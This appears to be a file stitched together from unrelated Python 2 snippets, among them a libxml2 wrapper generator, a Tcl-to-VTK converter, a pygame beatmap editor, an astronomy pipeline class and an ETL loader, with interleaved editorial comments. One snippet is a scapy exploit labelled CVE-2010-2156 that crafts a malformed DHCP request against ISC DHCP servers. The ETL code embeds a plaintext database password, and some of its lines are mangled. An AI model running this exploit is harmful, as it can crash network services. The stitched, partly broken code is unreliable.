try:
    e = make_Multiplies_double_double_double_double(d, d)
    a = e.this
except:
    print "make_Multiplies_double_double_double_double() did not return an instance"
    raise RuntimeError

s = string.split('%s' % e)[1]
if string.find(s, 'ArithUnaryFunction') == -1:
    print e, "is not an ArithUnaryFunction"
    raise RuntimeError
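
# The two repr-based checks above could share one helper; a sketch (the
# helper name is ours, not part of the SWIG test suite):
import string

def looks_like(obj, typename):
    # repr() of a wrapped object carries the C++ type name in its second
    # whitespace-separated token
    parts = string.split('%s' % obj)
    return len(parts) > 1 and string.find(parts[1], typename) != -1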
# Version: 4.0.x, 4.1.x, 4.2.x
# CVE: cve-2010-2156
# ps: it is possible to brute-force the subnet ip address to find a correct value.
#

import sys
import string

if len(sys.argv) == 1:   # was 'is 1', which only worked via small-int caching
    print("Usage: " + sys.argv[0] + " -ip=<legal ip in subnet>")
    print("Example: " + sys.argv[0] + " -ip=192.168.1.100")
    sys.exit(0)

for i in range(len(sys.argv)):
    if string.find(sys.argv[i], "-ip") == 0:   # was 'is 0'
        globals()['ip'] = sys.argv[i].split('=')[1]

from scapy.all import *

globals()['verbose'] = 2

def msg(string, level):
    # note: this parameter shadows the 'string' module inside msg()
    if globals()['verbose'] >= level:
        print(string)

msg("attack...", 2)

p = (Ether(src="aa:aa:aa:aa:aa:aa", dst="ff:ff:ff:ff:ff:ff") /
     IP(dst="255.255.255.255") /
     UDP(sport=68, dport=67) /
     BOOTP(ciaddr=globals()['ip'], chaddr="\xaa\xaa\xaa\xaa\xaa\xaa") /
     DHCP(options=[("message-type", "request"), ("client_id", ""), ("end")]))
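
# A sketch of the same option handling with an exact prefix test and a
# plain return value instead of writing into globals() (function name is
# ours):
def parse_ip(argv):
    for arg in argv[1:]:
        if arg[:4] == "-ip=":
            return arg.split("=", 1)[1]
    return None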
def Add(self, name, sidebar=None): self.number += 1 self.names[name] = self.number self.pages[self.number] = Element() element = self.pages[self.number] self.page = element element.name = name element.redraw = True element.tab = self.AddTab(name) # structure # +---+------------------+ # |+--++----------------+| # || || || # || || || # || || || # || || || # |+--++----------------+| # +----------------------+ element.hframe = TGHorizontalFrame(element.tab, 1, 1) element.tab.AddFrame(element.hframe, TOP_X_Y) # check for menu items if sidebar: element.sidebar = TGVerticalFrame(element.hframe, 1, 1) element.hframe.AddFrame(element.sidebar, TOP_LEFT) for code in sidebar: exec(code) element.display = TGHorizontalFrame(element.hframe, 1, 1) element.hframe.AddFrame(element.display, TOP_X_Y) from string import upper standardCanvas = find(upper(name), '3D') < 0 if standardCanvas: # set up a regular ROOT canvas if find(upper(name), 'LEGO') > -1: element.ecanvas \ = TRootEmbeddedGLCanvas("c%s" % name, element.display, self.width, self.height) else: element.ecanvas = TRootEmbeddedCanvas("c%s" % name, element.display, self.width, self.height) element.canvas = element.ecanvas.GetCanvas() element.display.AddFrame(element.ecanvas, TOP_X_Y) else: # set up a canvas that can handle 3D displays element.viewer = TGLEmbeddedViewer(element.display) element.display.AddFrame(element.viewer.GetFrame(), TOP_X_Y) # set sky blue background color bkg = element.viewer.ColorSet().Background() bkg.SetColor(SKYBLUE[0], SKYBLUE[1], SKYBLUE[2]) # draw axes root.DrawAxes(element.viewer) # we want our own simplified gui #TEveManager.Create(kFALSE, 'l') TEveManager.Create(kFALSE) element.canvas = TEveViewer("Viewer") element.canvas.SetGLViewer(element.viewer, element.viewer.GetFrame()) element.canvas.AddScene(gEve.GetEventScene()) gEve.GetViewers().AddElement(element.canvas) element.shapes = [] element.fixedelements = TEveElementList("fixed") element.elements = TEveElementList("transients") gEve.AddElement(element.fixedelements) gEve.AddElement(element.elements)
def replace_indef(l, indef):
    for i in range(len(l)):
        while string.find(l[i], "INDEF") > -1:
            idx = string.find(l[i], "INDEF")
            l[i] = l[i][:idx] + indef + l[i][idx + 5:]
    return l
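
# The find/slice loop above is equivalent to a plain substring replace; a
# sketch that returns a new list instead of mutating its argument:
import string

def replace_indef_copy(l, indef):
    return [string.replace(item, "INDEF", indef) for item in l]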
def processLine(line, output, keepTcl=1): line = string.strip(line) + "\n" if line[0] == '#': output.write(line) elif line[:15] == 'package require': if keepTcl == 1: output.write('# ' + line) elif string.find(line, "deiconify") > -1: output.write('# ' + line) else: if keepTcl == 1: output.write('#' + line) if string.find(line, 'expr') > -1: match = re.search("\[\s*expr ([^\]]+)\]", line).groups()[0] match = re.sub('\s+', '', match) line = re.sub("\[\s*expr ([^\]]+)\]", match, line) line = re.sub('\[', '', line) line = re.sub('\]', '', line) line = re.sub('ren1', 'ren', line) line = re.sub(';', '\n', line) line = re.sub('\$', '', line) line = re.sub('{', ' ', line) line = re.sub('}', ' ', line) n = len(line) keys = string.split(line) # handle set keyword. inSet = 0 if len(keys) and keys[0] == 'set': output.write(keys[1] + ' = ') keys = keys[2:] inSet = 1 keysLength = len(keys) inaModule = 0 inaForLoop = 0 if keysLength == 0: output.write(line) # Catch some tcl-specific keywords and comment out elif keys[0] == 'proc': inaModule = 0 output.write('def ' + keys[1] + '(') if len(keys) > 2: output.write(keys[2]) for i in range(3, len(keys)): output.write(', ' + keys[i]) output.write('):\n') elif keys[0] == 'catch': output.write('#' + line) elif keys[0] == 'source': output.write('#' + line) if re.search("colors.tcl", line) > -1: output.write("from colors import *") elif keys[0] == 'wm': output.write('#' + line) elif keysLength > 1 and keys[1] == 'SetUserMethod': if keepTcl == 1: output.write('#' + line) elif keys[0] == 'for' and keys[1] == 'set': inaForLoop = 1 #print '...Handling for loop' output.write("for " + keys[2] + " in range(" + keys[3] + ", ") upper = keys[6] if keys[5] == "<=": output.write(upper + "+1):\n") else: output.write(upper + "):\n") # Detect vtk class instance; Pythonize it. elif line[:3] == 'vtk': output.write(keys[1] + ' = vtk.' 
+ keys[0] + '()\n') else: lparen = 0 finishedFlag = 0 # for i in range(len(keys)-1): for i in range(len(keys)): ls = len(keys[i]) if keys[i] == 'eval': continue # continuation mark elif keys[i] == '\\': output.write(" \\\n") elif keys[i][-8:] == 'FileName': if keys[i + 1][0:1] == '"': f_name = re.sub('"VTK_DATA_ROOT/', \ 'VTK_DATA_ROOT + "/', keys[i+1]) output.write(keys[i] + "(" + f_name + ")") else: f_name = re.sub('VTK_DATA_ROOT/', \ 'VTK_DATA_ROOT + "/', keys[i+1]) if f_name[:13] == 'VTK_DATA_ROOT': output.write(keys[i] + "(" + f_name + "\")") else: output.write(keys[i] + "(\"" + keys[i + 1] + "\")") finishedFlag = 1 break elif keys[i] == 'SetColor': #print '...doing SetColor' #print keys if not re.search('[-\d.]', keys[i + 1][0:1]): #print '...got a named color' color = keys[i + 1][0:] #print 'color = ' + color output.write( "SetColor(" + color+"[0]," + \ color+"[1]," + color+"[2])" ) else: output.write("SetColor(" + keys[i + 1] + ", " + keys[i + 2] + ", " + keys[i + 3] + ")") finishedFlag = 1 break elif keys[i][:3] == 'Set' or keys[i][:3] == 'Add' or keys[ i][:6] == 'Insert': output.write(keys[i] + '(') lparen = 1 elif i < len(keys)-1 and \ re.search('[-\d.]', keys[i+1][0:1]) and \ not re.search('[-\d.]', keys[i][ls-1:ls]): output.write(keys[i] + '(') lparen = 1 elif keys[i][:3] == 'Get': output.write(keys[i] + '()') if i < len(keys) - 1: output.write('.') else: if i < len(keys) - 1: npos = re.search("[-\d.]", keys[i][0:1]) if npos > -1 or keys[i][0:3] == 'VTK': output.write(keys[i] + ', ') else: output.write(keys[i] + '.') else: if inaModule == 1: output.write('\t') output.write(keys[i]) if finishedFlag == 0: if keys[-1][:3] != 'Get' and \ (not re.search("[-+\d.]", keys[-1])): if lparen == 0: output.write('(') lparen = 1 else: output.write('\n') # Terminating right paren. #output.write( ')\n' ) if lparen == 1: output.write(')\n') if inSet == 1: output.write('\n')
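
# Caveat on the converter above: tests such as
#     if re.search("colors.tcl", line) > -1:
# compare a match object (or None) against an int, which only "works" via
# Python 2's arbitrary mixed-type ordering. The portable spelling is a
# truthiness test; a sketch:
import re

def mentions_colors(line):
    return re.search("colors.tcl", line) is not None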
** ensure the GNU Lesser General Public License version 3 requirements
** will be met: http://www.gnu.org/licenses/lgpl-3.0.html.""")

if (len(sys.argv) == 1):
    thisDirectory = os.getcwd()
else:
    thisDirectory = sys.argv[1]

LIGER_ROOT = os.path.join(thisDirectory, "../../")
print(LIGER_ROOT)

for root, dirs, files in os.walk(LIGER_ROOT):
    for fileName in files:
        if (fileName != "update_lic.py"):
            filePath = os.path.join(root, fileName)
            curText = open(filePath, 'r').read()
            for prevYearNum in range(startYearNum, curYearNum):
                if string.find(
                        curText,
                        oldLicTemplate.substitute(
                            startYear=str(startYearNum),
                            prevYear=str(prevYearNum))) != -1:
                    newFileText = string.replace(
                        curText,
                        oldLicTemplate.substitute(startYear=str(startYearNum),
                                                  prevYear=str(prevYearNum)),
                        newLicTemplate.substitute(startYear=str(startYearNum),
                                                  curYear=str(curYearNum)))
                    fileWriter = open(filePath, 'w')
                    fileWriter.write(newFileText)
                    fileWriter.close()   # was left unclosed
                    break
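
# The find-then-replace pair above can be collapsed: replace is a no-op
# when the needle is absent, so the membership test only decides whether
# the file needs rewriting. A sketch with str methods (names are ours):
def update_text(text, old_block, new_block):
    if text.find(old_block) != -1:
        return text.replace(old_block, new_block), True
    return text, False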
### 1. User set CSY File PATH
csyFilePath = "./temp/xxx.csy1"
flog = open("./result/EditWindow.dat", "wt")
enginekey = 'Abred'

print ' ===== start Abinit_import ======'
fr = open(csyFilePath, "rt")
wtext = fr.read()

result = ""
site = []
type = []   # note: shadows the 'type' builtin

wtext = string.split(wtext, "\n")
sss = ''
for iline in wtext:
    if (string.find(iline, '#') == 0):
        continue   # skip comment lines
    sss = sss + iline + '\n'
sss = string.split(sss)
print sss

ixx = 0

# for cell part
result = result + "\n"
result = result + set_cell_information(sss)
result = result + "CV1=PV1 \n"
result = result + "CV2=PV2 \n"
result = result + "CV3=PV3 \n"
result = result + set_site_line(sss)
result = result + set_type_line(sss)
# we get type information
def buildWrappers(): global ctypes global py_types global py_return_types global unknown_types global functions global function_classes global classes_type global classes_list global converter_type global primary_classes global converter_type global classes_ancestor global converter_type global primary_classes global classes_ancestor global classes_destructors global functions_noexcept for type in classes_type.keys(): function_classes[classes_type[type][2]] = [] # # Build the list of C types to look for ordered to start # with primary classes # ctypes = [] classes_list = [] ctypes_processed = {} classes_processed = {} for classe in primary_classes: classes_list.append(classe) classes_processed[classe] = () for type in classes_type.keys(): tinfo = classes_type[type] if tinfo[2] == classe: ctypes.append(type) ctypes_processed[type] = () for type in classes_type.keys(): if ctypes_processed.has_key(type): continue tinfo = classes_type[type] if not classes_processed.has_key(tinfo[2]): classes_list.append(tinfo[2]) classes_processed[tinfo[2]] = () ctypes.append(type) ctypes_processed[type] = () for name in functions.keys(): found = 0 (desc, ret, args, file, cond) = functions[name] for type in ctypes: classe = classes_type[type][2] if name[0:3] == "xml" and len(args) >= 1 and args[0][1] == type: found = 1 func = nameFixup(name, classe, type, file) info = (0, func, name, ret, args, file) function_classes[classe].append(info) elif name[0:3] == "xml" and len(args) >= 2 and args[1][1] == type \ and file != "python_accessor": found = 1 func = nameFixup(name, classe, type, file) info = (1, func, name, ret, args, file) function_classes[classe].append(info) elif name[0:4] == "html" and len(args) >= 1 and args[0][1] == type: found = 1 func = nameFixup(name, classe, type, file) info = (0, func, name, ret, args, file) function_classes[classe].append(info) elif name[0:4] == "html" and len(args) >= 2 and args[1][1] == type \ and file != "python_accessor": found = 1 func = nameFixup(name, classe, type, file) info = (1, func, name, ret, args, file) function_classes[classe].append(info) if found == 1: continue if name[0:8] == "xmlXPath": continue if name[0:6] == "xmlStr": continue if name[0:10] == "xmlCharStr": continue func = nameFixup(name, "None", file, file) info = (0, func, name, ret, args, file) function_classes['None'].append(info) classes = open("libxml2class.py", "w") txt = open("libxml2class.txt", "w") txt.write(" Generated Classes for libxml2-python\n\n") txt.write("#\n# Global functions of the module\n#\n\n") if function_classes.has_key("None"): flist = function_classes["None"] flist.sort(functionCompare) oldfile = "" for info in flist: (index, func, name, ret, args, file) = info if file != oldfile: classes.write("#\n# Functions from module %s\n#\n\n" % file) txt.write("\n# functions from module %s\n" % file) oldfile = file classes.write("def %s(" % func) txt.write("%s()\n" % func) n = 0 for arg in args: if n != 0: classes.write(", ") classes.write("%s" % arg[0]) n = n + 1 classes.write("):\n") writeDoc(name, args, ' ', classes) for arg in args: if classes_type.has_key(arg[1]): classes.write(" if %s is None: %s__o = None\n" % (arg[0], arg[0])) classes.write(" else: %s__o = %s%s\n" % (arg[0], arg[0], classes_type[arg[1]][0])) if ret[0] != "void": classes.write(" ret = ") else: classes.write(" ") classes.write("libxml2mod.%s(" % name) n = 0 for arg in args: if n != 0: classes.write(", ") classes.write("%s" % arg[0]) if classes_type.has_key(arg[1]): classes.write("__o") n = n + 1 classes.write(")\n") if 
ret[0] != "void": if classes_type.has_key(ret[0]): # # Raise an exception # if functions_noexcept.has_key(name): classes.write(" if ret is None:return None\n") elif string.find(name, "URI") >= 0: classes.write( " if ret is None:raise uriError('%s() failed')\n" % (name)) elif string.find(name, "XPath") >= 0: classes.write( " if ret is None:raise xpathError('%s() failed')\n" % (name)) elif string.find(name, "Parse") >= 0: classes.write( " if ret is None:raise parserError('%s() failed')\n" % (name)) else: classes.write( " if ret is None:raise treeError('%s() failed')\n" % (name)) classes.write(" return ") classes.write(classes_type[ret[0]][1] % ("ret")) classes.write("\n") else: classes.write(" return ret\n") classes.write("\n") txt.write("\n\n#\n# Set of classes of the module\n#\n\n") for classname in classes_list: if classname == "None": pass else: if classes_ancestor.has_key(classname): txt.write("\n\nClass %s(%s)\n" % (classname, classes_ancestor[classname])) classes.write("class %s(%s):\n" % (classname, classes_ancestor[classname])) classes.write(" def __init__(self, _obj=None):\n") if classes_ancestor[classname] == "xmlCore" or \ classes_ancestor[classname] == "xmlNode": classes.write(" if type(_obj).__name__ != ") classes.write("'PyCObject':\n") classes.write(" raise TypeError, ") classes.write("'%s needs a PyCObject argument'\n" % \ classname) if reference_keepers.has_key(classname): rlist = reference_keepers[classname] for ref in rlist: classes.write(" self.%s = None\n" % ref[1]) classes.write(" self._o = _obj\n") classes.write(" %s.__init__(self, _obj=_obj)\n\n" % (classes_ancestor[classname])) if classes_ancestor[classname] == "xmlCore" or \ classes_ancestor[classname] == "xmlNode": classes.write(" def __repr__(self):\n") format = "<%s (%%s) object at 0x%%x>" % (classname) classes.write( " return \"%s\" %% (self.name, long(pos_id (self)))\n\n" % (format)) else: txt.write("Class %s()\n" % (classname)) classes.write("class %s:\n" % (classname)) classes.write(" def __init__(self, _obj=None):\n") if reference_keepers.has_key(classname): list = reference_keepers[classname] for ref in list: classes.write(" self.%s = None\n" % ref[1]) classes.write( " if _obj != None:self._o = _obj;return\n") classes.write(" self._o = None\n\n") destruct = None if classes_destructors.has_key(classname): classes.write(" def __del__(self):\n") classes.write(" if self._o != None:\n") classes.write(" libxml2mod.%s(self._o)\n" % classes_destructors[classname]) classes.write(" self._o = None\n\n") destruct = classes_destructors[classname] flist = function_classes[classname] flist.sort(functionCompare) oldfile = "" for info in flist: (index, func, name, ret, args, file) = info # # Do not provide as method the destructors for the class # to avoid double free # if name == destruct: continue if file != oldfile: if file == "python_accessor": classes.write(" # accessors for %s\n" % (classname)) txt.write(" # accessors\n") else: classes.write(" #\n") classes.write(" # %s functions from module %s\n" % (classname, file)) txt.write("\n # functions from module %s\n" % file) classes.write(" #\n\n") oldfile = file classes.write(" def %s(self" % func) txt.write(" %s()\n" % func) n = 0 for arg in args: if n != index: classes.write(", %s" % arg[0]) n = n + 1 classes.write("):\n") writeDoc(name, args, ' ', classes) n = 0 for arg in args: if classes_type.has_key(arg[1]): if n != index: classes.write( " if %s is None: %s__o = None\n" % (arg[0], arg[0])) classes.write( " else: %s__o = %s%s\n" % (arg[0], arg[0], 
classes_type[arg[1]][0])) n = n + 1 if ret[0] != "void": classes.write(" ret = ") else: classes.write(" ") classes.write("libxml2mod.%s(" % name) n = 0 for arg in args: if n != 0: classes.write(", ") if n != index: classes.write("%s" % arg[0]) if classes_type.has_key(arg[1]): classes.write("__o") else: classes.write("self") if classes_type.has_key(arg[1]): classes.write(classes_type[arg[1]][0]) n = n + 1 classes.write(")\n") if ret[0] != "void": if classes_type.has_key(ret[0]): # # Raise an exception # if functions_noexcept.has_key(name): classes.write( " if ret is None:return None\n") elif string.find(name, "URI") >= 0: classes.write( " if ret is None:raise uriError('%s() failed')\n" % (name)) elif string.find(name, "XPath") >= 0: classes.write( " if ret is None:raise xpathError('%s() failed')\n" % (name)) elif string.find(name, "Parse") >= 0: classes.write( " if ret is None:raise parserError('%s() failed')\n" % (name)) else: classes.write( " if ret is None:raise treeError('%s() failed')\n" % (name)) # # generate the returned class wrapper for the object # classes.write(" __tmp = ") classes.write(classes_type[ret[0]][1] % ("ret")) classes.write("\n") # # Sometime one need to keep references of the source # class in the returned class object. # See reference_keepers for the list # tclass = classes_type[ret[0]][2] if reference_keepers.has_key(tclass): list = reference_keepers[tclass] for pref in list: if pref[0] == classname: classes.write(" __tmp.%s = self\n" % pref[1]) # # return the class # classes.write(" return __tmp\n") elif converter_type.has_key(ret[0]): # # Raise an exception # if functions_noexcept.has_key(name): classes.write(" if ret is None:return None") elif string.find(name, "URI") >= 0: classes.write( " if ret is None:raise uriError('%s() failed')\n" % (name)) elif string.find(name, "XPath") >= 0: classes.write( " if ret is None:raise xpathError('%s() failed')\n" % (name)) elif string.find(name, "Parse") >= 0: classes.write( " if ret is None:raise parserError('%s() failed')\n" % (name)) else: classes.write( " if ret is None:raise treeError('%s() failed')\n" % (name)) classes.write(" return ") classes.write(converter_type[ret[0]] % ("ret")) classes.write("\n") else: classes.write(" return ret\n") classes.write("\n") # # Generate enum constants # for type, enum in enums.items(): classes.write("# %s\n" % type) items = enum.items() items.sort(lambda i1, i2: cmp(long(i1[1]), long(i2[1]))) for name, value in items: classes.write("%s = %s\n" % (name, value)) classes.write("\n") txt.close() classes.close()
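
# The URI/XPath/Parse error dispatch above is pasted four times in this
# generator; a sketch of a single helper emitting the same generated line
# (the exception class names follow the generated code above):
import string

def write_null_check(out, name, indent="    "):
    if string.find(name, "URI") >= 0:
        exc = "uriError"
    elif string.find(name, "XPath") >= 0:
        exc = "xpathError"
    elif string.find(name, "Parse") >= 0:
        exc = "parserError"
    else:
        exc = "treeError"
    out.write("%sif ret is None:raise %s('%s() failed')\n"
              % (indent, exc, name))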
def processdate(datatype, yymm): hwlog = open('/root/proc/log/' + datatype + '_processing_' + yymm + '.log', 'w') hwlog.write("#####################################################\n") hwlog.write(" Starting " + datatype + '_' + yymm + "\n") hwlog.write("#####################################################\n") hwlog.write("Creating HDFS directory for " + datatype + " (" + yymm + ") ........\n") sqlstmt = 'select INSERVSERIAL, to_char(DATADATE,\'MM/DD/YYYY\'), YYMMDD, FILENAMEPATH, STATS_OUTPUTFILE_NAME, STATS_OUTPUTFILE_ID from vw_' + datatype + '_current where yymmdd=\'' + yymm + '\' order by inservserial' constr = 'ods/[email protected]:1521/callhomeods' oraconn = oracon.openconnect(constr) hwlog.write("Collecting files from DB") resultrec = oracon.execSql(oraconn, sqlstmt) dbloadfl = open('/root/proc/sql/' + datatype + '_' + yymm + '.sql', 'w') vertflsql = '/root/proc/sql/' + datatype + '_' + yymm + '.sql' ctr = 0 fctr = 0 totfiles = 0 maxthread = 50 for rec in resultrec: inserv = rec[0] datadate = rec[1] yymmdd = rec[2] filenamepath = rec[3] filename = rec[4] fileid = rec[5] try: datfl = open(filenamepath) currdir = '/root/proc/data/' outfl = open(currdir + filename, 'w') data = datfl.readlines() newdat = [] hwlog.write("Processing file :" + filenamepath + "\n") hwlog.flush() for dt in data: orgdt = string.replace(dt, '\n', '') orgdt = string.replace(orgdt, '\r', '') newdt = str(inserv) + '\t' + str( datadate) + '\t' + orgdt + '\t' + str(fileid) newdt = string.replace(newdt, '\t', '|') newdat.append(newdt) outfl.write(string.join(newdat, '\n')) outfl.close() checkcreatehdfsfolder(datatype, str(yymmdd), inserv) flstatus = commands.getoutput( 'curl -v -X GET "http://*****:*****@llhome -h callhomelab-vertica01 callhomedb & > /root/proc/log/' + datatype + '_' + yymm + '.sql.log') dbloadfl = open( '/root/proc/sql/' + datatype + '_' + yymm + '.sql', 'w') vertflsql = '/root/proc/sql/' + datatype + '_' + yymm + '.sql' numjobs = int(commands.getoutput('ps -ef | grep curl | wc -l')) while (numjobs - 1) > maxthread: time.sleep(30) numjobs = int( commands.getoutput('ps -ef | grep curl | wc -l')) maxthread = maxthread - (numjobs - 1) if maxthread < 0: maxthread = 50 crt = 0 ctr += 1 totfiles += 1 except: hwlog.write("Error : " + str(sys.exc_info()[1]) + "\n") break hwlog.write('Files for ' + yymm + ': are ' + str(totfiles) + '\n') totfiles = 0 hwlog.flush() dbloadfl.close() time.sleep(60) hwlog.write('Executing Vertica Script for ' + vertflsql + '\n') os.system( '/opt/vertica/bin/vsql -f ' + vertflsql + ' -U dbadmin -w c@llhome -h callhomelab-vertica01 callhomedb & > /root/proc/log/' + datatype + '_' + yymm + '.sql.log') os.system('rm -rf data/*.' + str(yymm) + '.*') resultrec.close() hwlog.write("Done processing " + yymm) hwlog.close() oraconn.close()
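
# Caveat on the job throttle above: 'ps -ef | grep curl | wc -l' also
# counts the grep process itself, so the count is always off by one. The
# usual shell trick avoids that; a sketch (commands is Python 2 only):
import commands

def count_running(pattern):
    # bracketing the first character keeps grep from matching its own
    # command line in the ps listing
    bracketed = "[" + pattern[0] + "]" + pattern[1:]
    return int(commands.getoutput("ps -ef | grep '%s' | wc -l" % bracketed))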
def Contains(s, sub):
    return string.find(s, sub) != -1
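
# The same test spelled with the 'in' operator, its direct equivalent
# (renamed so as not to shadow the helper above):
def Contains2(s, sub):
    return sub in s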
def _string(buffer):
    # guard against a missing NUL terminator: find() returns -1 there,
    # and buffer[:-1] would silently drop the last byte
    end = string.find(buffer, '\0')
    if end == -1:
        return buffer
    return buffer[:end]
def events(self): #Because the gameplay requires constant stream of keypress #information, continuously send anyway. self.playingUpdate() #for all other events for event in pygame.event.get(): #print event #quit when x button is pressed if event.type == pygame.QUIT: self.isRunning = False #check that the event has attr of key to prevent crashes if hasattr(event, 'key'): keys = pygame.key.get_pressed() if self.status["mapping"]: if keys[self.leftKey] and keys[self.shiftKey]: if self.currentBeat != "1:1:1": self.currentBeat = self.backwardSubBeat() self.loadMap() elif keys[self.leftKey]: if self.currentBeat != "1:1:1": for i in xrange(4): self.currentBeat = self.backwardSubBeat() self.loadMap() if keys[self.rightKey] and keys[self.shiftKey]: self.currentBeat = self.forwardSubBeat() self.loadMap() elif keys[self.rightKey]: for i in xrange(4): self.currentBeat = self.forwardSubBeat() self.loadMap() if keys[self.pKey]: if self.status["mapping"]: self.timerStart = time.time() self.timerDelay = convertTime(self.currentBeat, self.tempo) self.playMusic(self.music, self.timerDelay) if self.status["playback"]: self.timer = 0 pygame.mixer.music.stop() self.status["mapping"] = not self.status["mapping"] self.status["playback"] = not self.status["playback"] if keys[self.eKey]: fout = open("parsed.txt","wt") beats = list() with open("beatmap.txt","rt") as fin: content = fin.read().split("\n") content.sort() times = list() print content for i in xrange(len(content)): if i <= 1 or i == len(content)-1: continue line = content[i] beats.append(line) end = string.find(line, "\"", 3) timeCurrent = line[2:end] currentTime = convertTime(timeCurrent,self.tempo) times.append(currentTime) times.sort() diffs = list() print times for i in xrange(len(times)): timer = times[i] diff = 0 for j in xrange(2,len(times)): temp = times[i-j] if times != temp: diff = timer-temp break diffs.append(diff) lastMeasure = 0 for beat in beats: end = string.find(beat, ":",2) temp = beat[2:end] if temp != "": lastMeasure = int(temp) if int(temp)>int(lastMeasure) else lastMeasure print lastMeasure self.currentBeat = "1:1:1" pauseCount = 2 for i in xrange(lastMeasure*16): print self.currentBeat if self.currentBeat in self.notes: times = self.notes[self.currentBeat] print times for pos in times: fout.write("overload.makeBlook("+str(pos[0])+","+str(pos[1])+");\n") fout.write("yield return new WaitForSeconds("+str(diffs[pauseCount])+"f);\n") pauseCount+=1 self.currentBeat = self.forwardSubBeat() fout.close() #"yield return new WaitForSeconds(0.0f);" #makeBlock(x, y); if event.type == pygame.MOUSEBUTTONDOWN: (x,y)=pygame.mouse.get_pos() row,col = -1,-1 if (x>=20 and x<=620 and y>=20 and y<=420): x-=20; y-=20; row = y/100 col = x/100 if self.currentBeatGrid[row][col] == 0: print "WRITING", row,col self.currentBeatGrid[row][col] = 1 self.notes[self.currentBeat] = (col,row) self.writeMap(self.currentBeat,(col,row)) else: print "REMOVING" self.currentBeatGrid[row][col] = 0 vals = self.notes[self.currentBeat] vals.pop(vals.index((col,row))) self.notes[self.currentBeat] = vals self.removeMap(self.currentBeat,(col,row))
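
# Caveat on the mouse handler above: the first click on a beat stores a
# bare tuple in self.notes, but the removal branch later calls .pop() on
# that value as if it were a list. A sketch of list-based bookkeeping that
# both branches can agree on (plain functions, names are ours):
def add_note(notes, beat, pos):
    # one list of (col, row) positions per beat
    notes.setdefault(beat, []).append(pos)

def remove_note(notes, beat, pos):
    notes[beat].remove(pos)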
class DataSet: """ the class defines a new observation directory structure. The constructor builds the paths for the new observation (newobs). This tells anything receiving one of these objects where all the data is. The buildObs method creates the directory structure. """ def __init__(self, newobs, ownIraf=0): self.modName = string.split(string.split(str(self))[0], '.')[0][1:] # this is the module name self.newobs = newobs # new observation's name self.base = path.Env() self.configdir = self.base.getenv('CONFIGS') self.pardir = self.base.getenv('PARS') self.ingestdir = os.path.join(self.base.getenv('INGEST'), newobs) # where it is in the INGEST dir self.newobspath = os.path.join( self.base.getenv('DATASETS'), newobs) # new observation's path under $PIPELINE/DATASETS self.newpardir = os.path.join(self.newobspath, 'par') # parfile dir self.fitsdir = os.path.join(self.newobspath, 'Images') # the dir where all data is sent self.catdir = os.path.join(self.newobspath, 'Catalogs') self.prodir = os.path.join(self.newobspath, 'Output') #WZ self.reddir = os.path.join(self.newobspath, 'Red') #WZ self.aligndir = os.path.join(self.newobspath, 'align') self.messagedir = os.path.join(self.newobspath, 'Messages') self.root = self.newobspath self.ownIraf = ownIraf self.errorList = [] self.inputList = [] self.outputList = {} # outputList is now a dictionary to accomodate # predecessor images. # this instance variable is initialised here # and again in the buildObs method or not depending on the # value of the method call counter. self.fitslist must be # reset if buildObs() is called multiple times though if that # is being done, the caller is doing something extraordinary. self.fitslist = [] # this counter will track the number of calls of the buildObs method. self.buildObsCallCounter = 0 def getObsPath(self): """ return the path of the DataSet's root directory. """ return self.newobspath def getFitsPath(self): """ return the path of the DataSet's Images directory. """ return self.fitsdir def getCatPath(self): """ return the path of the DataSet's Catalogs directory. """ return self.catdir def getProdPath(self): """ return the path of the DataSet's products directory. """ return self.prodir #WZ def getProdPath(self): """ return the path of the DataSet's products directory. """ return self.reddir #WZ def getParPath(self): """ return the path of the DataSet's par directory. """ return self.newpardir def buildObs(self): """ set up the new observation directory structure. Copy the fits data from the Ingest area to the new observations dir under DATASETS. Copied files are determined from the asnDict dictionary. Also, this method sets up an IRAF environment for the pipeline, removing dependency on the user's environment, hopefully. """ datasets_dir = self.base.getenv('DATASETS') if not os.path.isdir(datasets_dir): print 'Cannot find the $DATASETS directory....WFP will try to create it.' try: os.makedirs(datasets_dir) print 'Created $DATASETS directory %s' % datasets_dir except OSError, error: print error sys.exit() if not os.path.isdir(self.newobspath): os.mkdir(self.newobspath) os.mkdir(self.fitsdir) self.logfile = logFile(self.newobspath) # Initiate the logfile self.asnDict = fUtil.makeAsnDict(self.ingestdir) # buildObsCallCounter tracks the number of times this method is called. # Previously every call of this method would reset the fitslist attr. # An effort to allow users to use their own fitslists of images # for wfp processing of non-wfp filter images. 
However, fitslist # will still get zeroed if this method is called more than once. self.buildObsCallCounter += 1 if self.buildObsCallCounter == 1: pass else: self.fitslist = [] for key in self.asnDict.keys(): self.fitslist.append(key) for file in self.asnDict[key]: self.fitslist.append(file) for i in self.fitslist: try: copyfile(os.path.join(self.ingestdir, i), os.path.join(self.fitsdir, i)) except IOError, err: self.logfile.write( "An IOError has occurred in the copyfile call") self.logfile.write("IOError:" + str(err)) raise IOError, err self.inputList = self.fitslist # inputList is for the mkMsg() method. self.logfile.write( 'Ingest Data moved to observation FITS dir complete.') os.mkdir(self.newpardir) os.mkdir(self.catdir) os.mkdir(self.prodir) #WZ os.mkdir(self.reddir) #WZ os.mkdir(self.aligndir) # get any default.* optional input files self.defaultlist = glob.glob(self.ingestdir + '/default*') for deffile in self.defaultlist: copy(deffile, self.fitsdir) # read the $PIPELINE/configs/login.cl file, adjust the home and userid settings # and write it to the images dir and make a uparm dir. See Bugzilla bug # 2077 # as to why this is being done. if not self.ownIraf: irafLoginLines = open(os.path.join(self.configdir, "login.cl")).readlines() newLoginFile = open(os.path.join(self.fitsdir, "login.cl"), "w") for line in irafLoginLines: if string.find(line, "set\thome\t\t=") != -1: newLoginFile.write("set\thome\t\t= \"" + self.fitsdir + "/\"\n") elif string.find(line, "set\tuserid\t\t=") != -1: newLoginFile.write("set\tuserid\t\t= \"" + os.environ["USER"] + "\"\n") else: newLoginFile.write(line) newLoginFile.close() os.mkdir(os.path.join(self.fitsdir, "uparm")) # set the env var MY_IRAF_HOME to be the images dir of the dataset os.environ["MY_IRAF_HOME"] = self.fitsdir # #pdb.set_trace() self._setIraf() if os.path.isfile(os.path.join(self.fitsdir, "default.shifts")): os.rename(os.path.join(self.fitsdir, "default.shifts"), os.path.join(self.aligndir, "default.shifts")) self.logfile.write( "Warning: buildObs method found a default.shifts file. Moved to align." ) os.mkdir(self.messagedir) self.logfile.write('Directory build complete.') # AKS - Include convert cts/s -> cts script here self.logfile.write('Converting counts/sec to counts.') for asn in self.asnDict.keys(): for file in self.asnDict[asn]: convertCts.convert_fits(self, os.path.join(self.fitsdir, file)) #for i in self.fitslist: # # Skip the association file marked by 